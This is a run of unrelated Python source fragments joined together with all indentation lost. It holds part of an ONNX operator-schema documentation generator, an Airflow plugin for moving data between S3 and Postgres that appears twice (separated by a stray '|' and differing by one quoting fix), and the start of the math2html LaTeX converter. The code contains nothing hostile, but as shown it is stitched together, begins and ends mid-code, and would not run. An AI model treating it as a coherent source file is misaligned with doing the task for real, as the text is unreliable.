linebreaks = 0
for text in texts:
lines = []
length = len(prefix)
if start:
length += + len(start)
# split text into words by splitting on space and remove empty splits ("")
# then split on newline boundaries, but keep empty splits ("\n\n")
words = [w.split("\n") for w in text.strip().split(" ") if w != ""]
words = list(itertools.chain(*words))
for w in words:
if w.strip() == "":
if linebreaks == 0:
linebreaks += 1
continue
if linebreaks >= 2:
# we already did 2 line breaks, skip this one
continue
# empty split, caused by "\n\n", should cause single line break
linebreaks += 1
length = len(prefix)
lines.append(prefix + " ".join(curr))
curr = []
if start:
length += len(start)
curr.append(" "*len(start))
continue
else:
linebreaks = 0
if length + len(w) < 79:
# keep adding words
length += len(w) + 1
curr.append(w)
continue
# line is full, do line break
length = len(prefix) + len(w)
lines.append(prefix + " ".join(curr))
curr = []
if start:
length += len(start)
curr.append(" "*len(start))
curr.append(w)
lines.append(prefix + " ".join(curr))
curr = []
if start:
curr.append(" "*len(start))
output.append("\n".join(lines))
return "\n".join(output)
class OnnxType(dict):
_onnxTensorDataType = {
"float": "ONNX__TENSOR_PROTO__DATA_TYPE__FLOAT",
"uint8": "ONNX__TENSOR_PROTO__DATA_TYPE__UINT8",
"int8": "ONNX__TENSOR_PROTO__DATA_TYPE__INT8",
"uint16": "ONNX__TENSOR_PROTO__DATA_TYPE__UINT16",
"int16": "ONNX__TENSOR_PROTO__DATA_TYPE__INT16",
"int32": "ONNX__TENSOR_PROTO__DATA_TYPE__INT32",
"int64": "ONNX__TENSOR_PROTO__DATA_TYPE__INT64",
"string": "ONNX__TENSOR_PROTO__DATA_TYPE__STRING",
"bool": "ONNX__TENSOR_PROTO__DATA_TYPE__BOOL",
"float16": "ONNX__TENSOR_PROTO__DATA_TYPE__FLOAT16",
"double": "ONNX__TENSOR_PROTO__DATA_TYPE__DOUBLE",
"uint32": "ONNX__TENSOR_PROTO__DATA_TYPE__UINT32",
"uint64": "ONNX__TENSOR_PROTO__DATA_TYPE__UINT64",
"complex64": "ONNX__TENSOR_PROTO__DATA_TYPE__COMPLEX64",
"complex128": "ONNX__TENSOR_PROTO__DATA_TYPE__COMPLEX128",
"bfloat16": "ONNX__TENSOR_PROTO__DATA_TYPE__BFLOAT16",
}
class _Scanner:
_tokens = {
re.compile(r"tensor") : "tensor" ,
re.compile(r"map") : "map" ,
re.compile(r"seq") : "seq" ,
re.compile(r"\(") : "(" ,
re.compile(r"\)") : ")" ,
re.compile(r"float") : "float" ,
re.compile(r"uint8") : "uint8" ,
re.compile(r"int8") : "int8" ,
re.compile(r"uint16") : "uint16" ,
re.compile(r"int16") : "int16" ,
re.compile(r"int32") : "int32" ,
re.compile(r"int64") : "int64" ,
re.compile(r"string") : "string" ,
re.compile(r"bool") : "bool" ,
re.compile(r"float16") : "float16" ,
re.compile(r"double") : "double" ,
re.compile(r"uint32") : "uint32" ,
re.compile(r"uint64") : "uint64" ,
re.compile(r"complex64") : "complex64" ,
re.compile(r"complex128") : "complex128",
re.compile(r"bfloat16") : "bfloat16" ,
re.compile(r",") : "," ,
re.compile(r"\s+") : None ,
}
def __init__(self, string):
self.string = string
self.tokens = self.tokenize(string)
def tokenize(self, string):
pos = 0
tokens = []
while string[pos:]:
allMatches = map(lambda x: (x[0].match(string[pos:]), x[1]), self._tokens.items())
validMatches = filter(lambda x: x[0], allMatches)
try:
longestMatch = max( validMatches, key=lambda x: x[0].end())
except:
raise SyntaxError(f"no token matches: '{string[pos:]}'")
else:
pos += longestMatch[0].end()
if longestMatch[1]:
tokens.append(longestMatch[1])
return tokens
def consume(self, expected_token = None):
if not expected_token:
return self.pop()
if not self.peek(expected_token):
raise SyntaxError(
f"expected '{expected_token}', but got '{self.peek()}'")
return self.pop()
def peek(self, expected_token=None):
token = self.tokens[0]
if expected_token:
return token == expected_token
else:
return token
def pop(self):
return self.tokens.pop(0)
def onToken(self, token2function, consume=False):
for token, function in token2function.items():
if self.peek(token):
if consume:
self.pop()
return function()
tokens = ", ".join([f"'{t}'" for t in token2function.keys()])
raise SyntaxError(f"expected one of {tokens}, but got '{self.peek()}'")
def __repr__(self):
return f"OnnxType._Scanner({self.string.__repr__()})"
class _Parser:
_terminals = {
"float": lambda: "float",
"uint8": lambda: "uint8",
"int8": lambda: "int8",
"uint16": lambda: "uint16",
"int16": lambda: "int16",
"int32": lambda: "int32",
"int64": lambda: "int64",
"string": lambda: "string",
"bool": lambda: "bool",
"float16": lambda: "float16",
"double": lambda: "double",
"uint32": lambda: "uint32",
"uint64": lambda: "uint64",
"complex64": lambda: "complex64",
"complex128": lambda: "complex128",
"bfloat16": lambda: "bfloat16",
}
def __init__(self, scanner):
self.scanner = scanner
def __repr__(self):
return f"OnnxType._Parser({self.scanner.__repr__()})"
def _rule_tensor(self):
self.scanner.consume('(')
result = self.scanner.onToken(self._terminals, consume=True)
self.scanner.consume(')')
return {"tensor": result}
def _rule_map(self):
rules = {
"tensor": self._rule_tensor,
"map": self._rule_map,
"seq": self._rule_seq,
}
rules.update(self._terminals)
self.scanner.consume('(')
key = self.scanner.onToken(self._terminals, consume=True)
self.scanner.consume(',')
value = self.scanner.onToken(rules, consume=True)
self.scanner.consume(')')
return {"map": (key, value)}
def _rule_seq(self):
rules = {
"tensor": self._rule_tensor,
"map": self._rule_map,
"seq": self._rule_seq
}
rules.update(self._terminals)
self.scanner.consume('(')
result = self.scanner.onToken(rules, consume=True)
self.scanner.consume(')')
return {"seq": result}
def parse(self):
rules = {
"tensor": self._rule_tensor,
"map": self._rule_map,
"seq": self._rule_seq,
}
return self.scanner.onToken(rules, consume=True)
def __init__(self, typeStr):
super()
self.original = typeStr
scanner = self._Scanner(typeStr)
parser = self._Parser(scanner)
self.update(parser.parse())
def __str__(self):
return self._text_walkParseTree(self)
def __repr__(self):
return f"OnnxType({self.original.__repr__()})"
def _text_walkParseTree(self, node):
if isinstance(node,str):
return node.replace("_","")
elif isinstance(node,dict):
subresults = []
for key,val in node.items():
subresults.append(key + "_" + self._text_walkParseTree(val))
return "__".join(subresults)
elif isinstance(node,tuple):
return "__".join([ self._text_walkParseTree(t) for t in node ])
else:
raise BaseException(f"unknown parseTree item: '{node}'")
def onnxTensorDataTypes(self):
results = []
self._onnxTensorDataType_walkParseTree(self, results)
return list(filter(None,results))
def _onnxTensorDataType_walkParseTree(self, node, results):
if isinstance(node,str):
results.append(None)
elif isinstance(node,dict):
for key,val in node.items():
if key == "tensor":
results.append(self._onnxTensorDataType[val])
else:
self._onnxTensorDataType_walkParseTree(val,results)
elif isinstance(node,tuple):
for val in node:
self._onnxTensorDataType_walkParseTree(val, results)
else:
raise BaseException(f"unknown parseTree item: '{node}'")
def __hash__(self):
return self.original.__hash__()
class OnnxTypeList(list):
def __init__(self, typeList):
super()
types = []
types.extend(typeList)
types.sort()
self.extend([OnnxType(t) for t in types])
def __str__(self):
return ", ".join([f"{t}" for t in self])
def __repr__(self):
types = ", ".join([t.original.__repr__() for t in self])
return f"OnnxTypeList([{types}])"
class OnnxConstraint():
def __init__(self, constraint, input=False, output=False):
if isinstance(constraint, dict):
self.types = constraint['types']
self.description = constraint['description']
self.name = constraint['name']
self.input = constraint['input']
self.output = constraint['output']
else:
self.types = OnnxTypeList(constraint.allowed_type_strs)
self.description = constraint.description
self.name = constraint.type_param_str
self.input = input
self.output = output
def text(self, prefix=""):
lines = []
lines.append(f"{prefix}Constraint {self.name}:")
lines.append(format_text(prefix + " ", "", [self.description]))
lines.append(format_text(prefix + " ", "Allowed Types:", [str(self.types)] ))
return "\n".join(lines)
def __repr__(self):
return f"OnnxConstraint({self.__dict__.__repr__()})"
class OnnxConstraints(dict):
def __init__(self, schema):
super()
constraints = {c.type_param_str for c in schema.type_constraints}
inputs = {i.typeStr for i in schema.inputs if i.typeStr in constraints}
outputs = {o.typeStr for o in schema.outputs if o.typeStr in constraints}
for constraint in schema.type_constraints:
self[constraint.type_param_str] = OnnxConstraint(constraint, input=constraint.type_param_str in inputs, output=constraint.type_param_str in outputs)
def typePermutations(self, filterInput=False, filterOutput=False):
return list(filter(None,(self.typePermutationText(p) for p in self.typePermutationsTuple(filterInput,filterOutput))))
def typePermutationText(self, permutation):
return "__".join([ f"{x[0]}_{x[1]}" for x in permutation ])
def typePermutationsTuple(self, filterInput=False, filterOutput=False):
# a implies b is the same as bool(a) ** bool(b)
values = filter(lambda x: (x.input ** filterInput) and (x.output ** filterOutput), self.values())
tuples = [list(map(lambda x: (c.name,x), c.types)) for c in values]
return itertools.product(*tuples)
def typePermutationsMap(self, filterInput=False, filterOutput=False):
result = {}
for permutation in self.typePermutationsTuple(filterInput, filterOutput):
tmp = result
constraints = []
for constraint in permutation:
constraints.append(constraint)
tmp = tmp.setdefault(tuple(constraints), {})
return result
def text(self, prefix=""):
paragraphs = [ c.text(prefix) for c in self.values() ]
return f"\n{prefix}\n".join(paragraphs)
def __str__(self):
return self.text()
class OnnxAttribute():
_onnxAttributeDataType = {
"UNDEFINED" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__UNDEFINED",
"FLOAT" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__FLOAT",
"INT" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__INT",
"STRING" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__STRING",
"TENSOR" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__TENSOR",
"GRAPH" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__GRAPH",
"SPARSE_TENSOR" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__SPARSE_TENSOR",
"FLOATS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__FLOATS",
"INTS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__INTS",
"STRINGS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__STRINGS",
"TENSORS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__TENSORS",
"GRAPHS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__GRAPHS",
"SPARSE_TENSORS" : "ONNX__ATTRIBUTE_PROTO__ATTRIBUTE_TYPE__SPARSE_TENSORS",
}
def __init__(self, name, attribute):
self.name = name
if isinstance(attribute, dict):
self.optional = attribute['optional']
self.type = attribute['type']
self.description = attribute['description']
else:
self.optional = attribute.required
self.type = attribute.type.name
self.description = attribute.description
def text(self, prefix=""):
lines = []
lines.append(f"{prefix}Attribute {self.type} {self.name} {'(optional)'*self.optional}:")
lines.append(format_text(prefix + " ", None, [self.description]))
return "\n".join(lines)
def onnxAttributeDataType(self):
return self._onnxAttributeDataType[self.type]
def __repr__(self):
attribute = self.__dict__.copy()
del attribute['name']
return f"OnnxAttribute({self.name.__repr__()}, {attribute.__repr__()})"
def __str__(self):
return self.text()
class OnnxAttributeList(list):
def __init__(self, schema):
super()
for name,attribute in schema.attributes.items():
self.append(OnnxAttribute(name, attribute))
def text(self, prefix=""):
paragraphs = [ a.text(prefix) for a in self ]
return f"\n{prefix}\n".join(paragraphs)
def __str__(self):
return self.text()
class OnnxInput():
def __init__(self, input):
if isinstance(input, dict):
self.name = input['name']
self.description = input['description']
self.isHomogeneous = input['isHomogeneous']
self.optional = input['optional']
self.variadic = input['variadic']
self.constraint = input['constraint']
self.types = input['types']
else:
self.name = input.name
self.description = input.description.strip()
self.isHomogeneous = input.isHomogeneous
self.optional = (input.option.name == "Optional")
self.variadic = (input.option.name == "Variadic")
self.constraint = input.typeStr
self.types = OnnxTypeList(input.types)
def text(self, prefix=""):
lines = []
lines.append(f"{prefix}Input {self.constraint} {self.name}:")
lines.append(format_text(prefix + " ", "", [self.description]))
lines.append(format_text(prefix + " ", "Allowed Types:", [str(self.types)] ))
return "\n".join(lines)
def __repr__(self):
return f"OnnxInput({self.__dict__.__repr__()})"
def __str__(self):
return self.text()
class OnnxInputList(list):
def __init__(self, schema):
super()
self.extend([ OnnxInput(i) for i in schema.inputs])
def text(self, prefix=""):
paragraphs = [ i.text(prefix) for i in self ]
return f"\n{prefix}\n".join(paragraphs)
def __str__(self):
return self.text()
class OnnxOutput():
def __init__(self, output):
if isinstance(output, dict):
self.name = output['name']
self.description = output['description']
self.isHomogeneous = output['isHomogeneous']
self.optional = output['optional']
self.variadic = output['variadic']
self.constraint = output['constraint']
self.types = output['types']
else:
self.name = output.name
self.description = output.description
self.isHomogeneous = output.isHomogeneous
self.optional = (output.option.name == "Optional")
self.variadic = (output.option.name == "Variadic")
self.constraint = output.typeStr
self.types = OnnxTypeList(output.types)
def text(self, prefix=""):
lines = []
lines.append(f"{prefix}Output {self.constraint} {self.name}:")
lines.append(format_text(prefix + " ", None, [self.description]))
lines.append(format_text(prefix + " ", "Allowed Types:", [str(self.types)] ))
return "\n".join(lines)
def __repr__(self):
return self.__dict__.__repr__()
def __str__(self):
return self.text()
class OnnxOutputList(list):
def __init__(self, schema):
super()
self.extend([ OnnxOutput(i) for i in schema.outputs])
def text(self, prefix=""):
paragraphs = [ i.text(prefix) for i in self ]
return f"\n{prefix}\n".join(paragraphs)
def __str__(self):
return self.text()
class OnnxDoc():
def __init__(self, schema):
if isinstance(schema,str):
self.doc = schema
else:
self.doc = schema.doc.strip()
def __repr__(self):
return f"OnnxDoc({self.doc.__repr__()})"
def text(self, prefix=" * "):
return prefix + f"\n{prefix}".join(self.doc.split('\n'))
def __str__(self):
return self.text()
class OnnxSchema():
def __init__(self, schema):
self.name = None
self.doc = None
self.deprecated = None
self.operator_name = None
self.version = None
self.domain = None
self.constraints = None
self.attributes = None
self.inputs = None
self.outputs = None
self.ref_doc = None
self.range_input = None
self.range_output = None
self.ref_file = None
self._schema = None
if isinstance(schema, dict):
self.__dict__.update(schema)
else:
self.doc = OnnxDoc(schema)
self.name = schema.name
self.deprecated = schema.deprecated
self.operator_name = self._operator_name(schema)
self.version = schema.since_version
self.domain = self._domain(schema)
self.constraints = OnnxConstraints(schema)
self.attributes = OnnxAttributeList(schema)
self.inputs = OnnxInputList(schema)
self.outputs = OnnxOutputList(schema)
self.ref_doc = self._ref_doc(schema)
self.range_input = (schema.min_input, schema.max_input)
self.range_output = (schema.min_output, schema.max_output)
self.ref_file = (schema.file,schema.line)
self._schema = schema
def __repr__(self):
return f"OnnxSchema({self.__dict__.__repr__()})"
def _operator_name(self, schema):
name = f"operator__{self._domain(schema)}__{schema.name}__{schema.since_version}"
return re.sub(r"\W", "_", name).lower()
def _domain(self, schema):
domain = "onnx"
if schema.domain:
domain = schema.domain
return domain.strip()
def _ref_doc(self, schema):
domain = self._domain(schema)
if domain == 'onnx':
return f"https://github.com/onnx/onnx/blob/master/docs/Operators.md#{schema.name}"
elif domain == 'ai.onnx.ml':
return f"https://github.com/onnx/onnx/blob/master/docs/Operators-ml.md#{schema.name}"
else:
return '' |
import csv
from tempfile import NamedTemporaryFile
from airflow.hooks.postgres_hook import PostgresHook
from airflow.hooks.S3_hook import S3Hook
from airflow.models import BaseOperator
from airflow.plugins_manager import AirflowPlugin
from airflow.utils.decorators import apply_defaults
from airflow.operators.postgres_operator import PostgresOperator
from airflow import macros
from contextlib import closing
import json
import uuid
class S3ToPostgresOperator(BaseOperator):
"""
Insert data into generic Postgres database with copy_from method from psycopg2
"""
template_fields = ("source_key", "dest_table")
@apply_defaults
def __init__(
self,
source_key,
source_bucket,
dest_table,
aws_conn_id="aws_default",
postgres_conn_id="postgres_default",
postgres_database=None,
copy_sep=",",
copy_null="",
is_json=False,
*args,
**kwargs,
):
super().__init__(*args, **kwargs)
self.source_key = source_key
self.source_bucket = source_bucket
self.dest_table = dest_table
self.aws_conn_id = aws_conn_id
self.postgres_conn_id = postgres_conn_id
self.postgres_database = postgres_database
self.copy_sep = copy_sep
self.copy_null = copy_null
self.is_json = is_json
def execute(self, context):
self.log.info("Getting Connections")
s3_hook = S3Hook(aws_conn_id=self.aws_conn_id)
postgres_hook = PostgresHook(postgres_conn_id=self.postgres_conn_id)
postgres_conn = postgres_hook.get_conn()
postgres_cursor = postgres_conn.cursor()
self.log.info("Downloading S3 File")
with NamedTemporaryFile() as source_csv:
source_obj = s3_hook.get_key(self.source_key, self.source_bucket)
with open(source_csv.name, "wb") as opened_source_csv:
source_obj.download_fileobj(opened_source_csv)
opened_source_csv.flush()
with open(source_csv.name, "r") as opened_csv:
if sum(1 for row in opened_csv) <= 1:
self.log.info("CSV returned no row(s). Skipping.")
return False
self.log.info("Replacing special chars")
with open(source_csv.name, "r+") as opened_source_csv, NamedTemporaryFile(
"w"
) as sanitized_csv:
if self.is_json:
for row in opened_source_csv:
sanitized_csv.write(row.replace("\\", "").replace("'", ""))
else:
csv_reader = csv.reader(opened_source_csv, delimiter=self.copy_sep)
csv_writer = csv.writer(sanitized_csv, delimiter=self.copy_sep)
for row in csv_reader:
csv_writer.writerow(
[
x.replace("\\", "").replace("'", "").replace("\n", " ")
for x in row
]
)
sanitized_csv.flush()
self.log.info("Copying File to database")
with open(sanitized_csv.name, "r") as opened_source_csv:
csv_reader = csv.reader(opened_source_csv, delimiter=self.copy_sep)
column_list = next(csv_reader)
self.log.info(f"Got columns: {column_list}")
postgres_cursor.copy_from(
opened_source_csv,
self.dest_table,
sep=self.copy_sep,
columns=column_list,
null=self.copy_null,
)
postgres_conn.commit()
class CreatePrefixTablePostgresOperator(PostgresOperator):
@apply_defaults
def __init__(
self,
schema,
table_prefix,
database,
column_types,
autocommit=True,
*args,
**kwargs,
):
self._table_prefix = table_prefix
self._schema = schema
self.autocommit = autocommit
self.column_types = column_types
types = ",\n".join(
f'\t"{variable}" {type}' for variable, type in column_types.items()
)
kwargs.update(
params=dict(
schema=schema, database=database, table_prefix=table_prefix, types=types
),
sql="""
DROP TABLE IF EXISTS "{{ params.schema }}"."{{ params.table_prefix }}_{{ macros.date.format_nodash(execution_date).lower() }}";
CREATE TABLE "{{ params.schema }}"."{{ params.table_prefix }}_{{ macros.date.format_nodash(execution_date).lower() }}"(
{{ params.types }}
);
""",
)
super().__init__(autocommit=self.autocommit, *args, **kwargs)
def execute(self, context):
super().execute(context)
return f"{ self._schema }.{ self._table_prefix }_{ macros.date.format_nodash(context["execution_date"]).lower() }"
class DropPrefixTablePostgresOperator(PostgresOperator):
@apply_defaults
def __init__(
self, schema, table_prefix, database, autocommit=True, *args, **kwargs
):
self.autocommit = autocommit
kwargs.update(
params=dict(schema=schema, database=database, table_prefix=table_prefix),
sql="""
DROP TABLE IF EXISTS "{{ params.schema }}"."{{ params.table_prefix }}_{{ macros.date.format_nodash(execution_date).lower() }}";
""",
)
super().__init__(autocommit=self.autocommit, *args, **kwargs)
class PostgresXcomOperator(BaseOperator):
template_fields = ("sql",)
@apply_defaults
def __init__(
self, postgres_conn_id, sql, database, python_callable=None, *args, **kwargs
):
super().__init__(*args, **kwargs)
self.postgres_conn_id = postgres_conn_id
self.sql = sql
self.database = database
self.python_callable = python_callable
def execute(self, context):
self.log.info("Going To Start Postgres Xcom Operator")
postgres_hook = PostgresHook(self.postgres_conn_id)
conn = postgres_hook.get_conn()
cursor = conn.cursor()
self.log.info(f"Going to run:\n{self.sql}")
cursor.execute(self.sql)
results = cursor.fetchall()
if self.python_callable:
results = self.python_callable(results)
if results:
self.log.info("Got results, pushing xcom")
return results
else:
self.log.info("No Results, pushing false")
return False
class PostgresToS3Operator(BaseOperator):
template_fields = ("sql", "dest_key")
template_ext = (".sql",)
@apply_defaults
def __init__(
self,
sql,
dest_key,
dest_bucket,
sql_parameters=None,
postgres_conn_id="postgres_default",
aws_conn_id="aws_default",
persist_header=True,
is_json=False,
iter_size=10000,
*args,
**kwargs,
):
super().__init__(*args, **kwargs)
self.postgres_conn_id = postgres_conn_id
self.aws_conn_id = aws_conn_id
self.sql = sql
self.dest_key = dest_key
self.dest_bucket = dest_bucket
self.sql_parameters = sql_parameters
self.persist_header = persist_header
self.is_json = is_json
self.iter_size = iter_size
def execute(self, context):
self.log.info("Start executing PostgresToS3Operator")
psql_hook = PostgresHook(postgres_conn_id=self.postgres_conn_id)
s3_hook = S3Hook(aws_conn_id=self.aws_conn_id)
with closing(psql_hook.get_conn()) as connection:
with connection, connection.cursor(str(uuid.uuid1())) as cursor:
cursor.itersize = self.iter_size
self.log.info(f"Going to execute query {self.sql}")
cursor.execute(self.sql, self.sql_parameters)
self.log.info("Writing data")
i = 0
with NamedTemporaryFile("w", encoding="utf-8") as temp_file:
if self.is_json:
for row in cursor:
i += 1
temp_file.write(json.dumps(row[0]))
temp_file.write("\n")
else:
writer = csv.writer(temp_file, lineterminator="\n")
for row in cursor:
i += 1
writer.writerow(row)
temp_file.flush()
if i < 1:
self.log.info("Got no rows from query. Skipping")
return False
columns = [description[0] for description in cursor.description]
self.log.info(f"Got columns {columns}")
with NamedTemporaryFile("w", encoding="utf-8") as file:
if self.persist_header:
writer = csv.writer(file, lineterminator="\n")
writer.writerow(columns)
file.flush()
with open(
temp_file.name, "r", encoding="utf-8"
) as opened_temp_file:
for row in opened_temp_file:
file.write(row)
file.flush()
s3_hook.load_file(
filename=file.name,
key=self.dest_key,
bucket_name=self.dest_bucket,
replace=True,
)
return True
class S3ToPostgresPlugin(AirflowPlugin):
name = "postgres_utils"
operators = [
S3ToPostgresOperator,
CreatePrefixTablePostgresOperator,
DropPrefixTablePostgresOperator,
PostgresXcomOperator,
PostgresToS3Operator,
]
hooks = []
executors = []
macros = []
admin_views = []
| import csv
from tempfile import NamedTemporaryFile
from airflow.hooks.postgres_hook import PostgresHook
from airflow.hooks.S3_hook import S3Hook
from airflow.models import BaseOperator
from airflow.plugins_manager import AirflowPlugin
from airflow.utils.decorators import apply_defaults
from airflow.operators.postgres_operator import PostgresOperator
from airflow import macros
from contextlib import closing
import json
import uuid
class S3ToPostgresOperator(BaseOperator):
"""
Insert data into generic Postgres database with copy_from method from psycopg2
"""
template_fields = ("source_key", "dest_table")
@apply_defaults
def __init__(
self,
source_key,
source_bucket,
dest_table,
aws_conn_id="aws_default",
postgres_conn_id="postgres_default",
postgres_database=None,
copy_sep=",",
copy_null="",
is_json=False,
*args,
**kwargs,
):
super().__init__(*args, **kwargs)
self.source_key = source_key
self.source_bucket = source_bucket
self.dest_table = dest_table
self.aws_conn_id = aws_conn_id
self.postgres_conn_id = postgres_conn_id
self.postgres_database = postgres_database
self.copy_sep = copy_sep
self.copy_null = copy_null
self.is_json = is_json
def execute(self, context):
self.log.info("Getting Connections")
s3_hook = S3Hook(aws_conn_id=self.aws_conn_id)
postgres_hook = PostgresHook(postgres_conn_id=self.postgres_conn_id)
postgres_conn = postgres_hook.get_conn()
postgres_cursor = postgres_conn.cursor()
self.log.info("Downloading S3 File")
with NamedTemporaryFile() as source_csv:
source_obj = s3_hook.get_key(self.source_key, self.source_bucket)
with open(source_csv.name, "wb") as opened_source_csv:
source_obj.download_fileobj(opened_source_csv)
opened_source_csv.flush()
with open(source_csv.name, "r") as opened_csv:
if sum(1 for row in opened_csv) <= 1:
self.log.info("CSV returned no row(s). Skipping.")
return False
self.log.info("Replacing special chars")
with open(source_csv.name, "r+") as opened_source_csv, NamedTemporaryFile(
"w"
) as sanitized_csv:
if self.is_json:
for row in opened_source_csv:
sanitized_csv.write(row.replace("\\", "").replace("'", ""))
else:
csv_reader = csv.reader(opened_source_csv, delimiter=self.copy_sep)
csv_writer = csv.writer(sanitized_csv, delimiter=self.copy_sep)
for row in csv_reader:
csv_writer.writerow(
[
x.replace("\\", "").replace("'", "").replace("\n", " ")
for x in row
]
)
sanitized_csv.flush()
self.log.info("Copying File to database")
with open(sanitized_csv.name, "r") as opened_source_csv:
csv_reader = csv.reader(opened_source_csv, delimiter=self.copy_sep)
column_list = next(csv_reader)
self.log.info(f"Got columns: {column_list}")
postgres_cursor.copy_from(
opened_source_csv,
self.dest_table,
sep=self.copy_sep,
columns=column_list,
null=self.copy_null,
)
postgres_conn.commit()
class CreatePrefixTablePostgresOperator(PostgresOperator):
@apply_defaults
def __init__(
self,
schema,
table_prefix,
database,
column_types,
autocommit=True,
*args,
**kwargs,
):
self._table_prefix = table_prefix
self._schema = schema
self.autocommit = autocommit
self.column_types = column_types
types = ",\n".join(
f'\t"{variable}" {type}' for variable, type in column_types.items()
)
kwargs.update(
params=dict(
schema=schema, database=database, table_prefix=table_prefix, types=types
),
sql="""
DROP TABLE IF EXISTS "{{ params.schema }}"."{{ params.table_prefix }}_{{ macros.date.format_nodash(execution_date).lower() }}";
CREATE TABLE "{{ params.schema }}"."{{ params.table_prefix }}_{{ macros.date.format_nodash(execution_date).lower() }}"(
{{ params.types }}
);
""",
)
super().__init__(autocommit=self.autocommit, *args, **kwargs)
def execute(self, context):
super().execute(context)
return f"{ self._schema }.{ self._table_prefix }_{ macros.date.format_nodash(context['execution_date']).lower() }"
class DropPrefixTablePostgresOperator(PostgresOperator):
@apply_defaults
def __init__(
self, schema, table_prefix, database, autocommit=True, *args, **kwargs
):
self.autocommit = autocommit
kwargs.update(
params=dict(schema=schema, database=database, table_prefix=table_prefix),
sql="""
DROP TABLE IF EXISTS "{{ params.schema }}"."{{ params.table_prefix }}_{{ macros.date.format_nodash(execution_date).lower() }}";
""",
)
super().__init__(autocommit=self.autocommit, *args, **kwargs)
class PostgresXcomOperator(BaseOperator):
template_fields = ("sql",)
@apply_defaults
def __init__(
self, postgres_conn_id, sql, database, python_callable=None, *args, **kwargs
):
super().__init__(*args, **kwargs)
self.postgres_conn_id = postgres_conn_id
self.sql = sql
self.database = database
self.python_callable = python_callable
def execute(self, context):
self.log.info("Going To Start Postgres Xcom Operator")
postgres_hook = PostgresHook(self.postgres_conn_id)
conn = postgres_hook.get_conn()
cursor = conn.cursor()
self.log.info(f"Going to run:\n{self.sql}")
cursor.execute(self.sql)
results = cursor.fetchall()
if self.python_callable:
results = self.python_callable(results)
if results:
self.log.info("Got results, pushing xcom")
return results
else:
self.log.info("No Results, pushing false")
return False
class PostgresToS3Operator(BaseOperator):
template_fields = ("sql", "dest_key")
template_ext = (".sql",)
@apply_defaults
def __init__(
self,
sql,
dest_key,
dest_bucket,
sql_parameters=None,
postgres_conn_id="postgres_default",
aws_conn_id="aws_default",
persist_header=True,
is_json=False,
iter_size=10000,
*args,
**kwargs,
):
super().__init__(*args, **kwargs)
self.postgres_conn_id = postgres_conn_id
self.aws_conn_id = aws_conn_id
self.sql = sql
self.dest_key = dest_key
self.dest_bucket = dest_bucket
self.sql_parameters = sql_parameters
self.persist_header = persist_header
self.is_json = is_json
self.iter_size = iter_size
def execute(self, context):
self.log.info("Start executing PostgresToS3Operator")
psql_hook = PostgresHook(postgres_conn_id=self.postgres_conn_id)
s3_hook = S3Hook(aws_conn_id=self.aws_conn_id)
with closing(psql_hook.get_conn()) as connection:
with connection, connection.cursor(str(uuid.uuid1())) as cursor:
cursor.itersize = self.iter_size
self.log.info(f"Going to execute query {self.sql}")
cursor.execute(self.sql, self.sql_parameters)
self.log.info("Writing data")
i = 0
with NamedTemporaryFile("w", encoding="utf-8") as temp_file:
if self.is_json:
for row in cursor:
i += 1
temp_file.write(json.dumps(row[0]))
temp_file.write("\n")
else:
writer = csv.writer(temp_file, lineterminator="\n")
for row in cursor:
i += 1
writer.writerow(row)
temp_file.flush()
if i < 1:
self.log.info("Got no rows from query. Skipping")
return False
columns = [description[0] for description in cursor.description]
self.log.info(f"Got columns {columns}")
with NamedTemporaryFile("w", encoding="utf-8") as file:
if self.persist_header:
writer = csv.writer(file, lineterminator="\n")
writer.writerow(columns)
file.flush()
with open(
temp_file.name, "r", encoding="utf-8"
) as opened_temp_file:
for row in opened_temp_file:
file.write(row)
file.flush()
s3_hook.load_file(
filename=file.name,
key=self.dest_key,
bucket_name=self.dest_bucket,
replace=True,
)
return True
class S3ToPostgresPlugin(AirflowPlugin):
name = "postgres_utils"
operators = [
S3ToPostgresOperator,
CreatePrefixTablePostgresOperator,
DropPrefixTablePostgresOperator,
PostgresXcomOperator,
PostgresToS3Operator,
]
hooks = []
executors = []
macros = []
admin_views = []
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# math2html: convert LaTeX equations to HTML output.
#
# Copyright (C) 2009-2011 Alex Fernández
#
# Released under the terms of the `2-Clause BSD license'_, in short:
# Copying and distribution of this file, with or without modification,
# are permitted in any medium without royalty provided the copyright
# notice and this notice are preserved.
# This file is offered as-is, without any warranty.
#
# .. _2-Clause BSD license: http://www.spdx.org/licenses/BSD-2-Clause
# Based on eLyXer: convert LyX source files to HTML output.
# http://alexfernandez.github.io/elyxer/
# --end--
# Alex 20101110
# eLyXer standalone formula conversion to HTML.
import codecs
import datetime
import gettext
import io
import os.path
import sys
import unicodedata
if sys.version_info >= (3, 0):
from urllib.parse import quote_plus
else:
from urllib import quote_plus
if sys.version_info >= (3, 0):
unicode = str #noqa
basestring = str # noqa
file = io.IOBase # noqa
class Trace(object):
"A tracing class"
debugmode = False
quietmode = False
showlinesmode = False
prefix = None
def debug(cls, message):
"Show a debug message"
if not Trace.debugmode or Trace.quietmode:
return
Trace.show(message, sys.stdout)
def message(cls, message):
"Show a trace message"
if Trace.quietmode:
return
if Trace.prefix and Trace.showlinesmode:
message = Trace.prefix + message
Trace.show(message, sys.stdout)
def error(cls, message):
"Show an error message"
message = '* ' + message
if Trace.prefix and Trace.showlinesmode:
message = Trace.prefix + message
Trace.show(message, sys.stderr)
def fatal(cls, message):
"Show an error message and terminate"
Trace.error('FATAL: ' + message)
exit(-1)
def show(cls, message, channel):
"Show a message out of a channel"
if sys.version_info < (3, 0):
message = message.encode('utf-8')
channel.write(message + '\n')
debug = classmethod(debug)
message = classmethod(message)
error = classmethod(error)
fatal = classmethod(fatal)
show = classmethod(show)
class BibStylesConfig(object):
